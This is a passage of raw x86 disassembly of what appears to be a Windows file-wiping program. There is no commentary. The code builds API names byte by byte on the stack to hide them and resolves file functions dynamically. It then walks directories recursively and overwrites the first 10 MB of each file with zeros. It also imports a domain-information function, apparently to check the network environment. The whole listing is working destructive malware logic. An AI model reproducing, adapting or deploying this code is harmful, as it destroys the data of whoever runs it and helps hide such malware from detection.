var_456= byte ptr -456h
var_455= byte ptr -455h
var_454= byte ptr -454h
var_453= byte ptr -453h
var_452= byte ptr -452h
var_450= dword ptr -450h
var_44C= byte ptr -44Ch
var_44B= byte ptr -44Bh
var_44A= byte ptr -44Ah
var_449= byte ptr -449h
var_448= byte ptr -448h
var_447= byte ptr -447h
var_446= byte ptr -446h
var_445= byte ptr -445h
var_444= byte ptr -444h
var_443= byte ptr -443h
var_442= byte ptr -442h
var_441= byte ptr -441h
var_440= byte ptr -440h
var_43F= byte ptr -43Fh
var_43E= byte ptr -43Eh
var_43D= byte ptr -43Dh
var_43C= byte ptr -43Ch
var_43B= byte ptr -43Bh
var_43A= byte ptr -43Ah
var_439= byte ptr -439h
var_438= byte ptr -438h
var_437= byte ptr -437h
var_436= byte ptr -436h
var_435= byte ptr -435h
var_434= byte ptr -434h
var_433= byte ptr -433h
var_430= byte ptr -430h
var_1C= byte ptr -1Ch
var_1B= byte ptr -1Bh
var_1A= byte ptr -1Ah
var_19= byte ptr -19h
var_18= byte ptr -18h
var_17= byte ptr -17h
var_16= byte ptr -16h
var_15= byte ptr -15h
var_14= byte ptr -14h
var_13= byte ptr -13h
var_10= byte ptr -10h
var_F= byte ptr -0Fh
var_E= byte ptr -0Eh
var_D= byte ptr -0Dh
var_C= byte ptr -0Ch
var_B= byte ptr -0Bh
var_A= byte ptr -0Ah
var_9= byte ptr -9
var_8= byte ptr -8
var_7= byte ptr -7
var_4= dword ptr -4
arg_0= dword ptr  8

push    ebp
mov     ebp, esp
sub     esp, 0E5Ch
mov     [ebp+var_E20], 0FFFFFFFFh
mov     [ebp+var_E1C], 2Ah ; '*'
mov     [ebp+var_E1B], 0
mov     [ebp+var_E40], 5Ch ; '\'
mov     [ebp+var_E3F], 0
lea     eax, [ebp+var_E40]
push    eax
mov     ecx, [ebp+arg_0]
push    ecx
lea     edx, [ebp+var_CC8]
push    edx
call    sub_402A80
add     esp, 0Ch
lea     eax, [ebp+var_E1C]
push    eax
lea     ecx, [ebp+var_CC8]
push    ecx
lea     edx, [ebp+var_898]
push    edx
call    sub_402A80
add     esp, 0Ch
mov     [ebp+var_8B4], 0
mov     [ebp+var_46C], 46h ; 'F'
mov     [ebp+var_46B], 69h ; 'i'
mov     [ebp+var_46A], 6Eh ; 'n'
mov     [ebp+var_469], 64h ; 'd'
mov     [ebp+var_468], 46h ; 'F'
mov     [ebp+var_467], 69h ; 'i'
mov     [ebp+var_466], 72h ; 'r'
mov     [ebp+var_465], 73h ; 's'
mov     [ebp+var_464], 74h ; 't'
mov     [ebp+var_463], 46h ; 'F'
mov     [ebp+var_462], 69h ; 'i'
mov     [ebp+var_461], 6Ch ; 'l'
mov     [ebp+var_460], 65h ; 'e'
mov     [ebp+var_45F], 41h ; 'A'
mov     [ebp+var_45E], 0
mov     [ebp+var_44C], 6Bh ; 'k'
mov     [ebp+var_44B], 0
mov     [ebp+var_44A], 65h ; 'e'
mov     [ebp+var_449], 0
mov     [ebp+var_448], 72h ; 'r'
mov     [ebp+var_447], 0
mov     [ebp+var_446], 6Eh ; 'n'
mov     [ebp+var_445], 0
mov     [ebp+var_444], 65h ; 'e'
mov     [ebp+var_443], 0
mov     [ebp+var_442], 6Ch ; 'l'
mov     [ebp+var_441], 0
mov     [ebp+var_440], 33h ; '3'
mov     [ebp+var_43F], 0
mov     [ebp+var_43E], 32h ; '2'
mov     [ebp+var_43D], 0
mov     [ebp+var_43C], 2Eh ; '.'
mov     [ebp+var_43B], 0
mov     [ebp+var_43A], 64h ; 'd'
mov     [ebp+var_439], 0
mov     [ebp+var_438], 6Ch ; 'l'
mov     [ebp+var_437], 0
mov     [ebp+var_436], 6Ch ; 'l'
mov     [ebp+var_435], 0
mov     [ebp+var_434], 0
mov     [ebp+var_433], 0
lea     eax, [ebp+var_46C]
push    eax
lea     ecx, [ebp+var_44C]
push    ecx
call    sub_401530
add     esp, 8
mov     [ebp+var_8B4], eax
mov     [ebp+var_E4C], 0
mov     [ebp+var_8B0], 46h ; 'F'
mov     [ebp+var_8AF], 69h ; 'i'
mov     [ebp+var_8AE], 6Eh ; 'n'
mov     [ebp+var_8AD], 64h ; 'd'
mov     [ebp+var_8AC], 4Eh ; 'N'
mov     [ebp+var_8AB], 65h ; 'e'
mov     [ebp+var_8AA], 78h ; 'x'
mov     [ebp+var_8A9], 74h ; 't'
mov     [ebp+var_8A8], 46h ; 'F'
mov     [ebp+var_8A7], 69h ; 'i'
mov     [ebp+var_8A6], 6Ch ; 'l'
mov     [ebp+var_8A5], 65h ; 'e'
mov     [ebp+var_8A4], 41h ; 'A'
mov     [ebp+var_8A3], 0
lea     edx, [ebp+var_8B0]
push    edx
lea     eax, [ebp+var_44C]
push    eax
call    sub_401530
add     esp, 8
mov     [ebp+var_E4C], eax
mov     [ebp+var_8A0], 0
mov     [ebp+var_E3C], 43h ; 'C'
mov     [ebp+var_E3B], 72h ; 'r'
mov     [ebp+var_E3A], 65h ; 'e'
mov     [ebp+var_E39], 61h ; 'a'
mov     [ebp+var_E38], 74h ; 't'
mov     [ebp+var_E37], 65h ; 'e'
mov     [ebp+var_E36], 46h ; 'F'
mov     [ebp+var_E35], 69h ; 'i'
mov     [ebp+var_E34], 6Ch ; 'l'
mov     [ebp+var_E33], 65h ; 'e'
mov     [ebp+var_E32], 41h ; 'A'
mov     [ebp+var_E31], 0
lea     ecx, [ebp+var_E3C]
push    ecx
lea     edx, [ebp+var_44C]
push    edx
call    sub_401530
add     esp, 8
mov     [ebp+var_8A0], eax
mov     [ebp+var_89C], 0
mov     [ebp+var_E18], 47h ; 'G'
mov     [ebp+var_E17], 65h ; 'e'
mov     [ebp+var_E16], 74h ; 't'
mov     [ebp+var_E15], 46h ; 'F'
mov     [ebp+var_E14], 69h ; 'i'
mov     [ebp+var_E13], 6Ch ; 'l'
mov     [ebp+var_E12], 65h ; 'e'
mov     [ebp+var_E11], 53h ; 'S'
mov     [ebp+var_E10], 69h ; 'i'
mov     [ebp+var_E0F], 7Ah ; 'z'
mov     [ebp+var_E0E], 65h ; 'e'
mov     [ebp+var_E0D], 0
lea     eax, [ebp+var_E18]
push    eax
lea     ecx, [ebp+var_44C]
push    ecx
call    sub_401530
add     esp, 8
mov     [ebp+var_89C], eax
mov     [ebp+var_E48], 0
mov     [ebp+var_45C], 4Ch ; 'L'
mov     [ebp+var_45B], 6Fh ; 'o'
mov     [ebp+var_45A], 63h ; 'c'
mov     [ebp+var_459], 61h ; 'a'
mov     [ebp+var_458], 6Ch ; 'l'
mov     [ebp+var_457], 41h ; 'A'
mov     [ebp+var_456], 6Ch ; 'l'
mov     [ebp+var_455], 6Ch ; 'l'
mov     [ebp+var_454], 6Fh ; 'o'
mov     [ebp+var_453], 63h ; 'c'
mov     [ebp+var_452], 0
lea     edx, [ebp+var_45C]
push    edx
lea     eax, [ebp+var_44C]
push    eax
call    sub_401530
add     esp, 8
mov     [ebp+var_E48], eax
mov     [ebp+var_E30], 0
mov     [ebp+var_488], 53h ; 'S'
mov     [ebp+var_487], 65h ; 'e'
mov     [ebp+var_486], 74h ; 't'
mov     [ebp+var_485], 46h ; 'F'
mov     [ebp+var_484], 69h ; 'i'
mov     [ebp+var_483], 6Ch ; 'l'
mov     [ebp+var_482], 65h ; 'e'
mov     [ebp+var_481], 50h ; 'P'
mov     [ebp+var_480], 6Fh ; 'o'
mov     [ebp+var_47F], 69h ; 'i'
mov     [ebp+var_47E], 6Eh ; 'n'
mov     [ebp+var_47D], 74h ; 't'
mov     [ebp+var_47C], 65h ; 'e'
mov     [ebp+var_47B], 72h ; 'r'
mov     [ebp+var_47A], 0
lea     ecx, [ebp+var_488]
push    ecx
lea     edx, [ebp+var_44C]
push    edx
call    sub_401530
add     esp, 8
mov     [ebp+var_E30], eax
mov     [ebp+var_450], 0
mov     [ebp+var_1C], 57h ; 'W'
mov     [ebp+var_1B], 72h ; 'r'
mov     [ebp+var_1A], 69h ; 'i'
mov     [ebp+var_19], 74h ; 't'
mov     [ebp+var_18], 65h ; 'e'
mov     [ebp+var_17], 46h ; 'F'
mov     [ebp+var_16], 69h ; 'i'
mov     [ebp+var_15], 6Ch ; 'l'
mov     [ebp+var_14], 65h ; 'e'
mov     [ebp+var_13], 0
lea     eax, [ebp+var_1C]
push    eax
lea     ecx, [ebp+var_44C]
push    ecx
call    sub_401530
add     esp, 8
mov     [ebp+var_450], eax
mov     [ebp+var_E0C], 0
mov     [ebp+var_478], 4Ch ; 'L'
mov     [ebp+var_477], 6Fh ; 'o'
mov     [ebp+var_476], 63h ; 'c'
mov     [ebp+var_475], 61h ; 'a'
mov     [ebp+var_474], 6Ch ; 'l'
mov     [ebp+var_473], 46h ; 'F'
mov     [ebp+var_472], 72h ; 'r'
mov     [ebp+var_471], 65h ; 'e'
mov     [ebp+var_470], 65h ; 'e'
mov     [ebp+var_46F], 0
lea     edx, [ebp+var_478]
push    edx
lea     eax, [ebp+var_44C]
push    eax
call    sub_401530
add     esp, 8
mov     [ebp+var_E0C], eax
mov     [ebp+var_4], 0
mov     [ebp+var_E2C], 43h ; 'C'
mov     [ebp+var_E2B], 6Ch ; 'l'
mov     [ebp+var_E2A], 6Fh ; 'o'
mov     [ebp+var_E29], 73h ; 's'
mov     [ebp+var_E28], 65h ; 'e'
mov     [ebp+var_E27], 48h ; 'H'
mov     [ebp+var_E26], 61h ; 'a'
mov     [ebp+var_E25], 6Eh ; 'n'
mov     [ebp+var_E24], 64h ; 'd'
mov     [ebp+var_E23], 6Ch ; 'l'
mov     [ebp+var_E22], 65h ; 'e'
mov     [ebp+var_E21], 0
lea     ecx, [ebp+var_E2C]
push    ecx
lea     edx, [ebp+var_44C]
push    edx
call    sub_401530
add     esp, 8
mov     [ebp+var_4], eax
mov     [ebp+var_E44], 0
mov     [ebp+var_10], 46h ; 'F'
mov     [ebp+var_F], 69h ; 'i'
mov     [ebp+var_E], 6Eh ; 'n'
mov     [ebp+var_D], 64h ; 'd'
mov     [ebp+var_C], 43h ; 'C'
mov     [ebp+var_B], 6Ch ; 'l'
mov     [ebp+var_A], 6Fh ; 'o'
mov     [ebp+var_9], 73h ; 's'
mov     [ebp+var_8], 65h ; 'e'
mov     [ebp+var_7], 0
lea     eax, [ebp+var_10]
push    eax
lea     ecx, [ebp+var_44C]
push    ecx
call    sub_401530
add     esp, 8
mov     [ebp+var_E44], eax
lea     edx, [ebp+var_E08]
push    edx
lea     eax, [ebp+var_898]
push    eax
call    [ebp+var_8B4]
mov     [ebp+var_E20], eax
cmp     [ebp+var_E20], 0FFFFFFFFh
jnz     short loc_402867
jmp     loc_402A7A

loc_402867:
mov     ecx, [ebp+var_E08]
and     ecx, 10h
jz      loc_402913
movsx   edx, [ebp+var_DDC]
cmp     edx, 2Eh ; '.'
jnz     short loc_40289E
movsx   eax, [ebp+var_DDB]
test    eax, eax
jz      short loc_402899
movsx   ecx, [ebp+var_DDB]
cmp     ecx, 2Eh ; '.'
jnz     short loc_40289E

loc_402899:
jmp     loc_402A51

loc_40289E:
mov     edx, [ebp+var_E08]
and     edx, 2
jnz     short loc_4028B4
mov     eax, [ebp+var_E08]
and     eax, 4
jz      short loc_4028B9

loc_4028B4:
jmp     loc_402A51

loc_4028B9:
lea     ecx, [ebp+var_E40]
push    ecx
mov     edx, [ebp+arg_0]
push    edx
lea     eax, [ebp+var_CC8]
push    eax
call    sub_402A80
add     esp, 0Ch
lea     ecx, [ebp+var_DDC]
push    ecx
lea     edx, [ebp+var_CC8]
push    edx
lea     eax, [ebp+var_430]
push    eax
call    sub_402A80
add     esp, 0Ch
lea     ecx, [ebp+var_430]
push    ecx
call    sub_401A10
add     esp, 4
lea     edx, [ebp+var_430]
push    edx
call    sub_4022A0
add     esp, 4
jmp     loc_402A51

loc_402913:
lea     eax, [ebp+var_E40]
push    eax
mov     ecx, [ebp+arg_0]
push    ecx
lea     edx, [ebp+var_CC8]
push    edx
call    sub_402A80
add     esp, 0Ch
lea     eax, [ebp+var_DDC]
push    eax
lea     ecx, [ebp+var_CC8]
push    ecx
lea     edx, [ebp+var_430]
push    edx
call    sub_402A80
add     esp, 0Ch
lea     eax, [ebp+var_430]
push    eax
call    sub_401A10
add     esp, 4
test    eax, eax
jnz     short loc_402962
jmp     loc_402A51

loc_402962:
push    0
push    80h
push    3
push    0
push    3
push    0C0000000h
lea     ecx, [ebp+var_430]
push    ecx
call    [ebp+var_8A0]
mov     [ebp+var_E54], eax
cmp     [ebp+var_E54], 0FFFFFFFFh
jnz     short loc_402995
jmp     loc_402A51

loc_402995:
push    0
mov     edx, [ebp+var_E54]
push    edx
call    [ebp+var_89C]
mov     [ebp+var_E5C], eax
cmp     [ebp+var_E5C], 0
jnb     short loc_4029B8
jmp     loc_402A51

loc_4029B8:
cmp     [ebp+var_E5C], 0A00000h
jbe     short loc_4029CE
mov     [ebp+var_E5C], 0A00000h

loc_4029CE:
mov     [ebp+var_E58], 0
mov     eax, [ebp+var_E5C]
push    eax
push    40h ; '@'
call    [ebp+var_E48]
mov     [ebp+var_E50], eax
mov     ecx, [ebp+var_E5C]
push    ecx
mov     edx, [ebp+var_E50]
push    edx
call    sub_402B10
add     esp, 8
push    0
push    0
push    0
mov     eax, [ebp+var_E54]
push    eax
call    [ebp+var_E30]
push    0
lea     ecx, [ebp+var_E58]
push    ecx
mov     edx, [ebp+var_E5C]
push    edx
mov     eax, [ebp+var_E50]
push    eax
mov     ecx, [ebp+var_E54]
push    ecx
call    [ebp+var_450]
mov     edx, [ebp+var_E50]
push    edx
call    [ebp+var_E0C]
mov     eax, [ebp+var_E54]
push    eax
call    [ebp+var_4]

loc_402A51:
lea     ecx, [ebp+var_E08]
push    ecx
mov     edx, [ebp+var_E20]
push    edx
call    [ebp+var_E4C]
test    eax, eax
jnz     loc_402867
mov     eax, [ebp+var_E20]
push    eax
call    [ebp+var_E44]

loc_402A7A:
mov     esp, ebp
pop     ebp
retn
sub_4022A0 endp

align 10h


; Attributes: bp-based frame

sub_402A80 proc near

var_C= dword ptr -0Ch
var_5= byte ptr -5
var_4= dword ptr -4
arg_0= dword ptr  8
arg_4= dword ptr  0Ch
arg_8= dword ptr  10h

push    ebp
mov     ebp, esp
sub     esp, 0Ch
mov     [ebp+var_C], 0
mov     eax, [ebp+arg_4]
mov     cl, [eax]
mov     [ebp+var_5], cl

loc_402A95:
movsx   edx, [ebp+var_5]
test    edx, edx
jz      short loc_402ABE
mov     eax, [ebp+arg_0]
add     eax, [ebp+var_C]
mov     cl, [ebp+var_5]
mov     [eax], cl
mov     edx, [ebp+var_C]
add     edx, 1
mov     [ebp+var_C], edx
mov     eax, [ebp+arg_4]
add     eax, [ebp+var_C]
mov     cl, [eax]
mov     [ebp+var_5], cl
jmp     short loc_402A95

loc_402ABE:
mov     [ebp+var_4], 0
mov     edx, [ebp+arg_8]
mov     al, [edx]
mov     [ebp+var_5], al

loc_402ACD:
movsx   ecx, [ebp+var_5]
test    ecx, ecx
jz      short loc_402AFF
mov     edx, [ebp+arg_0]
add     edx, [ebp+var_C]
mov     al, [ebp+var_5]
mov     [edx], al
mov     ecx, [ebp+var_4]
add     ecx, 1
mov     [ebp+var_4], ecx
mov     edx, [ebp+var_C]
add     edx, 1
mov     [ebp+var_C], edx
mov     eax, [ebp+arg_8]
add     eax, [ebp+var_4]
mov     cl, [eax]
mov     [ebp+var_5], cl
jmp     short loc_402ACD

loc_402AFF:
mov     edx, [ebp+arg_0]
add     edx, [ebp+var_C]
mov     byte ptr [edx], 0
mov     esp, ebp
pop     ebp
retn
sub_402A80 endp

align 10h


; Attributes: bp-based frame

sub_402B10 proc near

var_4= dword ptr -4
arg_0= dword ptr  8
arg_4= dword ptr  0Ch

push    ebp
mov     ebp, esp
push    ecx
mov     [ebp+var_4], 0
jmp     short loc_402B26

loc_402B1D:
mov     eax, [ebp+var_4]
add     eax, 1
mov     [ebp+var_4], eax

loc_402B26:
mov     eax, [ebp+arg_4]
cdq
and     edx, 3
add     eax, edx
sar     eax, 2
cmp     [ebp+var_4], eax
jge     short loc_402B46
mov     ecx, [ebp+var_4]
mov     edx, [ebp+arg_0]
mov     dword ptr [edx+ecx*4], 0
jmp     short loc_402B1D

loc_402B46:
mov     esp, ebp
pop     ebp
retn
sub_402B10 endp

align 100h
dd 100h dup(?)
_text ends

; Section 2. (virtual address 00003000)
; Virtual size                  : 0000006A (    106.)
; Section size in file          : 00000200 (    512.)
; Offset to raw data for section: 00002000
; Flags 40000040: Data Readable
; Alignment     : default
;
; Imports from NETAPI32.dll
;

; Segment type: Externs
; _idata
; DWORD (__stdcall *DsRoleGetPrimaryDomainInformation)(LPCWSTR lpServer, DSROLE_PRIMARY_DOMAIN_INFO_LEVEL InfoLevel, PBYTE *Buffer)
extrn DsRoleGetPrimaryDomainInformation:dword



; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 403008h
__IMPORT_DESCRIPTOR_NETAPI32 dd rva off_403030 ; Import Name Table
dd 0                    ; Time stamp
dd 0                    ; Forwarder Chain
dd rva aNetapi32Dll     ; DLL Name
dd rva DsRoleGetPrimaryDomainInformation ; Import Address Table
db    0
db    0
db    0
db    0
db    0
db    0
db    0
db    0
db    0
db    0
db    0
db    0
db    0
db    0
db    0
db    0
db    0
db    0
db    0
db    0
;
; Import names for NETAPI32.dll
;
off_403030 dd rva word_403038
dd 0
word_403038 dw 27h
db 'DsRoleGetPrimaryDomainInformation',0
aNetapi32Dll db 'NETAPI32.dll',0
align 1000h
_rdata ends


end start
